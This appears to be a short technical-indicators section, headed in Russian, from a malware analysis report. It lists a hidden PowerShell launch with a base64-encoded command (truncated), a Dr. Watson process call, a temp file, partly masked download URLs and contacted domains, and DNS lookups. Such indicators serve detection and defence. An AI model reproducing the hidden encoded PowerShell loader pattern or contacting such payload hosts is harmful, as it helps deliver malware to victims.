Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABFAHkAdABhAHQAZgBjAGwAdAA9ACcATgBsAGwAYgBnAHAAbgBzACcAOwAkAEkAagB1AHMAZwB3AG0AdgBvAGUAZAByACAAPQAgACcAOAAzADIAJwA7ACQAWABuAHoAagBoAHQAbABzAGQAPQAnAFgAYQBqAHkAegB0AGQAcgB4AHEAcwB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1576
- %TEMP%\1221425.cvr
- 'nn.###elematics.com':80
- 'ka#######toursandtravels.com':80
- 'so###nline.org':443
- http://nn.###elematics.com/temp/qck7s/
- http://nn.###elematics.com/temp/qck7s/1
- http://ka#######toursandtravels.com/cli/wBeE3l1Fs/
- 'so###nline.org':443
- DNS ASK ba#####hindonesia.com
- DNS ASK nn.###elematics.com
- DNS ASK ka#######toursandtravels.com
- DNS ASK so###nline.org
- DNS ASK el###esign.com